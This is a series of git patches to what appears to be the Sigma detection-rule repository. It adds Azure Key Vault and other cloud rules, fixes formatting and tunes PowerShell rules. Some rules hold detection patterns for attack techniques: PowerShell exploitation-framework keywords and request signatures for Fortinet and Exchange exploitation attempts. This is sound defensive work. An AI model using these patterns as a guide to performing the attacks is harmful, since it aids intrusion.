b/rules/windows/builtin/win_powershelll_empire.yml index 6dc937fe..a765f45d 100644 --- a/rules/windows/builtin/win_powershelll_empire.yml +++ b/rules/windows/builtin/win_powershelll_empire.yml @@ -1,6 +1,7 @@ title: Powershell Empire Cmdlets Seen In Command Line id: ef88eb96-861c-43a0-ab16-f3835a97c928 description: Identifies instances of PowerShell Empire cmdlets in powershell process command line data. +author: sawwinnnaung references: - Azure Sentinel date: 2021/08/15 diff --git a/rules/windows/builtin/win_user_acc_added_removed.yml b/rules/windows/builtin/win_user_acc_added_removed.yml index f8ee4d37..8e083b64 100644 --- a/rules/windows/builtin/win_user_acc_added_removed.yml +++ b/rules/windows/builtin/win_user_acc_added_removed.yml @@ -1,6 +1,7 @@ title: Account Added And Removed From Privileged Groups id: 7efc75ce-e2a4-400f-a8b1-283d3b0f2c60 description: Identifies accounts that are added to privileged group and then quickly removed, which could be a sign of compromise. +author: sawwinnnaung references: - Azure Sentinel date: 2021/08/15 diff --git a/rules/windows/builtin/win_user_acc_enabled_disabled.yml b/rules/windows/builtin/win_user_acc_enabled_disabled.yml index 72857cbc..920efc48 100644 --- a/rules/windows/builtin/win_user_acc_enabled_disabled.yml +++ b/rules/windows/builtin/win_user_acc_enabled_disabled.yml @@ -1,6 +1,7 @@ title: User Account Enabled And Disabled id: 3d023f64-8225-41a2-9570-2bd7c2c4535e description: Identifies when a user account is enabled and then disabled. This can be an indication of compromise and an adversary attempting to hide in the noise. +author: sawwinnnaung references: - Azure Sentinel date: 2021/08/15 diff --git a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml index 3eb3c977..57bb606c 100644 --- a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml +++ b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml @@ -1,6 +1,7 @@ title: New Uer Created And Added To The Built-in Administrators Group id: aa1eff90-29d4-49dc-a3ea-b65199f516db description: Identifies when a user account was created and then added to the builtin Administrators group. This should be monitored closely and all additions reviewed. +author: sawwinnnaung references: - Azure Sentinel date: 2021/08/15 From cfb863a98e199097d116694626f27c786ffc35a6 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 16 Aug 2021 11:52:22 -0500 Subject: [PATCH 0409/1367] Update aws_eks_cluster_created_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index 1c07e6bb..36d21067 100644 --- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -1,5 +1,4 @@ - -title: AWS EKS Cluster Created or Deleted + title: AWS EKS Cluster Created or Deleted id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. author: Austin Songer From 2a3acd7d119f561bc9f17bac2de6bd4fc2f3ca16 Mon Sep 17 00:00:00 2001 From: Theo Guidoux Date: Mon, 16 Aug 2021 19:32:54 +0200 Subject: [PATCH 0410/1367] add selection flag for backward compatibility --- tools/sigma/backends/sql.py | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/sql.py b/tools/sigma/backends/sql.py index f18cac2f..b31fba2b 100644 --- a/tools/sigma/backends/sql.py +++ b/tools/sigma/backends/sql.py @@ -46,7 +46,10 @@ class SQLBackend(SingleTextQueryBackend): options = SingleTextQueryBackend.options + ( ("table", "eventlog", "Use this option to specify table name.", None), ("select", "*", "Use this option to specify fields you want to select. Example: \"--backend-option select=xxx,yyy\"", None), + ("selection", False, "Use this option to enable fields selection from Sigma rules.", None), ) + + selection_enabled = False def __init__(self, sigmaconfig, options): @@ -62,6 +65,9 @@ class SQLBackend(SingleTextQueryBackend): else: self.select_fields = list() + if "selection" in options: + self.selection_enabled = True + def generateANDNode(self, node): generated = [ self.generateNode(val) for val in node ] filtered = [ g for g in generated if g is not None ] @@ -162,13 +168,19 @@ class SQLBackend(SingleTextQueryBackend): # Then add fields specified in the backend configuration fields.extend(self.select_fields) + # In case select is specified in backend option, we want to enable selection + if len(self.select_fields) > 0: + self.selection_enabled = True + # Finally, in case fields is empty, add the default value if not fields: fields = list("*") for parsed in sigmaparser.condparsed: - #query = self.generateQuery(parsed) - query = self._generateQueryWithFields(parsed, fields) + if self.selection_enabled: + query = self._generateQueryWithFields(parsed, fields) + else: + query = self.generateQuery(parsed) before = self.generateBefore(parsed) after = self.generateAfter(parsed) From 80062ff5cdd250a05896ac01b40d929391de33fd Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 16 Aug 2021 12:42:14 -0500 Subject: [PATCH 0411/1367] Update aws_eks_cluster_created_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index 36d21067..cf4598c6 100644 --- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -1,4 +1,4 @@ - title: AWS EKS Cluster Created or Deleted +title: AWS EKS Cluster Created or Deleted id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. author: Austin Songer From accb675ed54a7b63f09d2897093c22ba022c08b8 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 16 Aug 2021 20:36:55 +0200 Subject: [PATCH 0412/1367] fix error space --- rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index cf4598c6..342d5744 100644 --- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -1,5 +1,5 @@ title: AWS EKS Cluster Created or Deleted -id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 +id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. author: Austin Songer status: experimental @@ -12,12 +12,12 @@ detection: selection: eventSource: eks.amazonaws.com eventName: - - CreateCluster - - DeleteCluster + - CreateCluster + - DeleteCluster condition: selection level: low tags: - - attack. + - attack.impact falsepositives: - EKS Cluster being created or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. From e098fc73cb2fb18c723fd9727e116e9dc9bcb22e Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 17 Aug 2021 06:24:04 +0200 Subject: [PATCH 0413/1367] add keywords condition --- rules/web/web_cve_2021_26858_iis_rce.yml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/rules/web/web_cve_2021_26858_iis_rce.yml b/rules/web/web_cve_2021_26858_iis_rce.yml index d630eafe..12b98180 100644 --- a/rules/web/web_cve_2021_26858_iis_rce.yml +++ b/rules/web/web_cve_2021_26858_iis_rce.yml @@ -19,7 +19,14 @@ detection: - 'schema=Reset' - 'VirtualDirectory' cs-username|endswith: '$' - condition: selection + keywords: + - 'POST' + - '200' + - '/ecp/DDI/DDIService.svc/SetObject' + - 'schema=Reset' + - 'VirtualDirectory' + - '$' + condition: selection or all of keywords falsepositives: - Unlikely level: critical From 144cfcb016ed9d3fcb3523ed883dabc5b675b67b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 16 Aug 2021 23:30:30 -0500 Subject: [PATCH 0414/1367] Create azure_application_gateway_modified_or_deleted.yml --- ...pplication_gateway_modified_or_deleted.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml diff --git a/rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml b/rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml new file mode 100644 index 00000000..bb7b1e75 --- /dev/null +++ b/rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml @@ -0,0 +1,23 @@ +title: Azure Application Gateway Modified or Deleted +id: ad87d14e-7599-4633-ba81-aeb60cfe8cd6 +description: Identifies when a application gateway is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/WRITE + - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Application gateway being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 3c8f27ba7683107da043612c0e0c25792bc4859e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 16 Aug 2021 23:31:45 -0500 Subject: [PATCH 0415/1367] Create azure_application_security_group_modified_or_deleted.yml --- ...ion_security_group_modified_or_deleted.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml diff --git a/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml b/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml new file mode 100644 index 00000000..686380ee --- /dev/null +++ b/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml @@ -0,0 +1,23 @@ +title: Azure Application Security Group Modified or Deleted +id: 835747f1-9329-40b5-9cc3-97d465754ce6 +description: Identifies when a application security group is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/WRITE + - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Application security group being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 824d64a9ce37f10cd74f83186dc1da520865b951 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 16 Aug 2021 23:41:43 -0500 Subject: [PATCH 0416/1367] Create azure_key_vault_modified_or_deleted.yml --- .../azure_key_vault_modified_or_deleted.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/cloud/azure/azure_key_vault_modified_or_deleted.yml diff --git a/rules/cloud/azure/azure_key_vault_modified_or_deleted.yml b/rules/cloud/azure/azure_key_vault_modified_or_deleted.yml new file mode 100644 index 00000000..f019e0d4 --- /dev/null +++ b/rules/cloud/azure/azure_key_vault_modified_or_deleted.yml @@ -0,0 +1,28 @@ +title: Azure Key Vault Modified or Deleted. +id: 459a2970-bb84-4e6a-a32e-ff0fbd99448d +description: Identifies when a key vault is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KEYVAULT/VAULTS/WRITE + - MICROSOFT.KEYVAULT/VAULTS/DELETE + - MICROSOFT.KEYVAULT/VAULTS/DEPLOY/ACTION + - MICROSOFT.KEYVAULT/VAULTS/ACCESSPOLICIES/WRITE + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access + - attack.t1552 + - attack.t1552.001 +falsepositives: + - Key Vault being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 758293e2f97d9281a627c9049c4c86d1ec599f9c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 16 Aug 2021 23:42:15 -0500 Subject: [PATCH 0417/1367] Delete azure_application_security_group_modified_or_deleted.yml --- ...ion_security_group_modified_or_deleted.yml | 23 ------------------- 1 file changed, 23 deletions(-) delete mode 100644 rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml diff --git a/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml b/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml deleted file mode 100644 index 686380ee..00000000 --- a/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml +++ /dev/null @@ -1,23 +0,0 @@ -title: Azure Application Security Group Modified or Deleted -id: 835747f1-9329-40b5-9cc3-97d465754ce6 -description: Identifies when a application security group is modified or deleted. -author: Austin Songer -status: experimental -date: 2021/08/16 -references: - - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations -logsource: - service: azure.activitylogs -detection: - selection: - properties.message: - - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/WRITE - - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/DELETE - condition: selection -level: medium -tags: - - attack.impact -falsepositives: - - Application security group being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 7abceb07cedf9d79ef35f2ea97ea9d437a2c7c39 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 16 Aug 2021 23:50:56 -0500 Subject: [PATCH 0418/1367] Create azure_vault_key_modified_or_deleted.yml --- .../azure_vault_key_modified_or_deleted.yml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/cloud/azure/azure_vault_key_modified_or_deleted.yml diff --git a/rules/cloud/azure/azure_vault_key_modified_or_deleted.yml b/rules/cloud/azure/azure_vault_key_modified_or_deleted.yml new file mode 100644 index 00000000..cfc56d8f --- /dev/null +++ b/rules/cloud/azure/azure_vault_key_modified_or_deleted.yml @@ -0,0 +1,30 @@ +title: Azure Key Modified or Deleted +id: 80eeab92-0979-4152-942d-96749e11df40 +description: Identifies when a key is modified or deleted in Azure. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KEYVAULT/VAULTS/KEYS/UPDATE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE + - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/IMPORT/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/RECOVER/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/RESTORE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/DELETE + - MICROSOFT.KEYVAULT/VAULTS/KEYS/BACKUP/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/PURGE/ACTION + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Key being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 1fcc1701b73150ab61b1e2e3546cfdc597ed481a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 16 Aug 2021 23:54:57 -0500 Subject: [PATCH 0419/1367] Create azure_keyvault_secrets_modified_or_deleted.yml --- ...e_keyvault_secrets_modified_or_deleted.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml diff --git a/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml new file mode 100644 index 00000000..d63ba3b5 --- /dev/null +++ b/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml @@ -0,0 +1,28 @@ +title: Azure Keyvault Secrets Modified or Deleted +id: b831353c-1971-477b-abb6-2828edc3bca1 +description: Identifies when secrets are modified or deleted in Azure. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/DELETE + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/BACKUP/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/PURGE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/UPDATE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/RECOVER/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/RESTORE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/SETSECRET/ACTION + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Secrets being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 84e96d5b4f3c96c493fd9456526d7a22562cf2d2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 17 Aug 2021 00:04:00 -0500 Subject: [PATCH 0420/1367] Create azure_suppression_rule_created.yml --- .../azure/azure_suppression_rule_created.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/azure/azure_suppression_rule_created.yml diff --git a/rules/cloud/azure/azure_suppression_rule_created.yml b/rules/cloud/azure/azure_suppression_rule_created.yml new file mode 100644 index 00000000..1c8361af --- /dev/null +++ b/rules/cloud/azure/azure_suppression_rule_created.yml @@ -0,0 +1,24 @@ +title: Azure Suppression Rule Created +id: 92cc3e5d-eb57-419d-8c16-5c63f325a401 +description: Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations + - + - +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Suppression Rule being created may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 9986515b59ab87b5705510a8c5ae4e21963e19bb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 17 Aug 2021 00:04:11 -0500 Subject: [PATCH 0421/1367] Update azure_suppression_rule_created.yml --- rules/cloud/azure/azure_suppression_rule_created.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/rules/cloud/azure/azure_suppression_rule_created.yml b/rules/cloud/azure/azure_suppression_rule_created.yml index 1c8361af..be4d70d3 100644 --- a/rules/cloud/azure/azure_suppression_rule_created.yml +++ b/rules/cloud/azure/azure_suppression_rule_created.yml @@ -6,8 +6,6 @@ status: experimental date: 2021/08/16 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations - - - - logsource: service: azure.activitylogs detection: From 80b3acfce970f2e351f0d216e3fa70e944dc9867 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 17 Aug 2021 12:03:49 +0200 Subject: [PATCH 0422/1367] fix: false positive with Xen / Oracle scripts --- rules/windows/powershell/powershell_suspicious_keywords.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_suspicious_keywords.yml b/rules/windows/powershell/powershell_suspicious_keywords.yml index c363bf38..2f672aea 100644 --- a/rules/windows/powershell/powershell_suspicious_keywords.yml +++ b/rules/windows/powershell/powershell_suspicious_keywords.yml @@ -3,7 +3,7 @@ id: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf status: experimental description: Detects keywords that could indicate the use of some PowerShell exploitation framework date: 2019/02/11 -modified: 2021/06/10 +modified: 2021/08/17 author: Florian Roth, Perez Diego (@darkquassar) references: - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462 @@ -29,7 +29,7 @@ detection: - "Runtime.InteropServices.DllImportAttribute" - "SuspendThread" - "rundll32" - - "FromBase64" + # - "FromBase64" - "Invoke-WMIMethod" - "http://127.0.0.1" condition: keywords From ecdcd8f843545c35aab18dbe45cdb5b968b99654 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 17 Aug 2021 08:30:10 -0500 Subject: [PATCH 0423/1367] Rename azure_key_vault_modified_or_deleted.yml to azure_keyvault_modified_or_deleted.yml --- ...fied_or_deleted.yml => azure_keyvault_modified_or_deleted.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/azure/{azure_key_vault_modified_or_deleted.yml => azure_keyvault_modified_or_deleted.yml} (100%) diff --git a/rules/cloud/azure/azure_key_vault_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure/azure_key_vault_modified_or_deleted.yml rename to rules/cloud/azure/azure_keyvault_modified_or_deleted.yml From 16e0def41d3aab4f7fa73df2330adb36289be131 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 17 Aug 2021 08:31:22 -0500 Subject: [PATCH 0424/1367] Update and rename azure_vault_key_modified_or_deleted.yml to azure_keyvault_key_modified_or_deleted.yml --- ...deleted.yml => azure_keyvault_key_modified_or_deleted.yml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename rules/cloud/azure/{azure_vault_key_modified_or_deleted.yml => azure_keyvault_key_modified_or_deleted.yml} (91%) diff --git a/rules/cloud/azure/azure_vault_key_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml similarity index 91% rename from rules/cloud/azure/azure_vault_key_modified_or_deleted.yml rename to rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml index cfc56d8f..32227e46 100644 --- a/rules/cloud/azure/azure_vault_key_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml @@ -1,6 +1,6 @@ -title: Azure Key Modified or Deleted +title: Azure Keyvault Key Modified or Deleted id: 80eeab92-0979-4152-942d-96749e11df40 -description: Identifies when a key is modified or deleted in Azure. +description: Identifies when a Keyvault Key is modified or deleted in Azure. author: Austin Songer status: experimental date: 2021/08/16 From 23d04771206a24c6dc67e70510aca704202f8e7b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 17 Aug 2021 08:42:41 -0500 Subject: [PATCH 0425/1367] Update azure_keyvault_secrets_modified_or_deleted.yml --- .../cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml index d63ba3b5..d8a15e15 100644 --- a/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml @@ -22,6 +22,9 @@ detection: level: medium tags: - attack.impact + - attack.credential_access + - attack.t1552 + - attack.t1552.001 falsepositives: - Secrets being modified or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. From 309e71491b4e0bd84586e00a384432fc5aac4cd6 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 17 Aug 2021 08:44:39 -0500 Subject: [PATCH 0426/1367] Update azure_keyvault_key_modified_or_deleted.yml --- rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml index 32227e46..06ece7f9 100644 --- a/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml @@ -24,6 +24,9 @@ detection: level: medium tags: - attack.impact + - attack.credential_access + - attack.t1552 + - attack.t1552.001 falsepositives: - Key being modified or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. From 5fa5a412d5679c18e7daf53de2c0bf14b32c1e93 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 18 Aug 2021 09:49:34 +0200 Subject: [PATCH 0427/1367] fix: FPs with [reflection.assembly]::Load --- .../windows/powershell/powershell_suspicious_keywords.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/powershell/powershell_suspicious_keywords.yml b/rules/windows/powershell/powershell_suspicious_keywords.yml index c09396e0..991dfc3c 100644 --- a/rules/windows/powershell/powershell_suspicious_keywords.yml +++ b/rules/windows/powershell/powershell_suspicious_keywords.yml @@ -3,7 +3,7 @@ id: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf status: experimental description: Detects keywords that could indicate the use of some PowerShell exploitation framework date: 2019/02/11 -modified: 2021/08/17 +modified: 2021/08/18 author: Florian Roth, Perez Diego (@darkquassar) references: - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462 @@ -20,9 +20,9 @@ logsource: definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277. Monitor for EventID 4104' detection: keywords: - - "System.Reflection.Assembly.Load" - - "[System.Reflection.Assembly]::Load" - - "[Reflection.Assembly]::Load" + - "System.Reflection.Assembly.Load($" + - "[System.Reflection.Assembly]::Load($" + - "[Reflection.Assembly]::Load($" - "System.Reflection.AssemblyName" - "Reflection.Emit.AssemblyBuilderAccess" - "Runtime.InteropServices.DllImportAttribute" From 8d9f2e059ad2f24a50d8d8fd2b9154c7181e02ef Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Wed, 18 Aug 2021 17:28:57 +0545 Subject: [PATCH 0428/1367] Added rule for zero day CVE-2021-22123 in Fortinet WAFs --- .../web_fortinet_cve_2021_22123_exploit.yml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/web/web_fortinet_cve_2021_22123_exploit.yml diff --git a/rules/web/web_fortinet_cve_2021_22123_exploit.yml b/rules/web/web_fortinet_cve_2021_22123_exploit.yml new file mode 100644 index 00000000..42615b9d --- /dev/null +++ b/rules/web/web_fortinet_cve_2021_22123_exploit.yml @@ -0,0 +1,30 @@ +title: Fortinet CVE-2021-22123 Exploitation +description: Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs +id: f425637f-891c-4191-a6c4-3bb1b70513b4 +references: + - https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection +author: Bhabesh Raj +date: 2021/08/18 +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection: + c-uri|contains: + - '/api/v2.0/user/remoteserver.saml' + cs-method: + - POST + content-type|startswith: + - 'multipart/form-data;' + content-disposition|contains: + - '`' + condition: selection +fields: + - client_ip + - url + - response +falsepositives: + - Unknown +level: critical From 6a282ad24a13b6229cf68e5d5524d7941856bab5 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 18 Aug 2021 13:56:14 +0200 Subject: [PATCH 0429/1367] fix many FP --- .../powershell_alternate_powershell_hosts.yml | 8 ++++---- .../powershell/powershell_renamed_powershell.yml | 11 ++++++----- 2 files changed, 10 insertions(+), 9 deletions(-) diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index 22389518..65aa3a58 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml @@ -2,9 +2,9 @@ action: global title: Alternate PowerShell Hosts id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe -status: experimental +status: test date: 2019/08/11 -modified: 2021/08/16 +modified: 2021/08/18 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html @@ -26,7 +26,7 @@ detection: EventID: 4103 ContextInfo: '*' filter: - ContextInfo: 'powershell.exe' + ContextInfo|endswith: 'powershell.exe' condition: selection and not filter --- logsource: @@ -38,5 +38,5 @@ detection: EventID: 400 HostApplication: '*' filter: - HostApplication: 'powershell.exe' + HostApplication|endswith: 'powershell.exe' condition: selection and not filter \ No newline at end of file diff --git a/rules/windows/powershell/powershell_renamed_powershell.yml b/rules/windows/powershell/powershell_renamed_powershell.yml index 97bde1b5..5b6304ef 100644 --- a/rules/windows/powershell/powershell_renamed_powershell.yml +++ b/rules/windows/powershell/powershell_renamed_powershell.yml @@ -1,12 +1,12 @@ -title: Renamed Powershell +title: Renamed Powershell Under Powershell Channel id: 30a8cb77-8eb3-4cfb-8e79-ad457c5a4592 description: Detects renamed powershell -status: experimental +status: test references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse author: Harish Segar, frack113 date: 2020/06/29 -modified: 2021/07/04 +modified: 2021/08/18 tags: - attack.execution - attack.t1086 @@ -17,10 +17,11 @@ logsource: detection: selection: EventID: 400 - HostName: "ConsoleHost" + HostName: ConsoleHost filter: 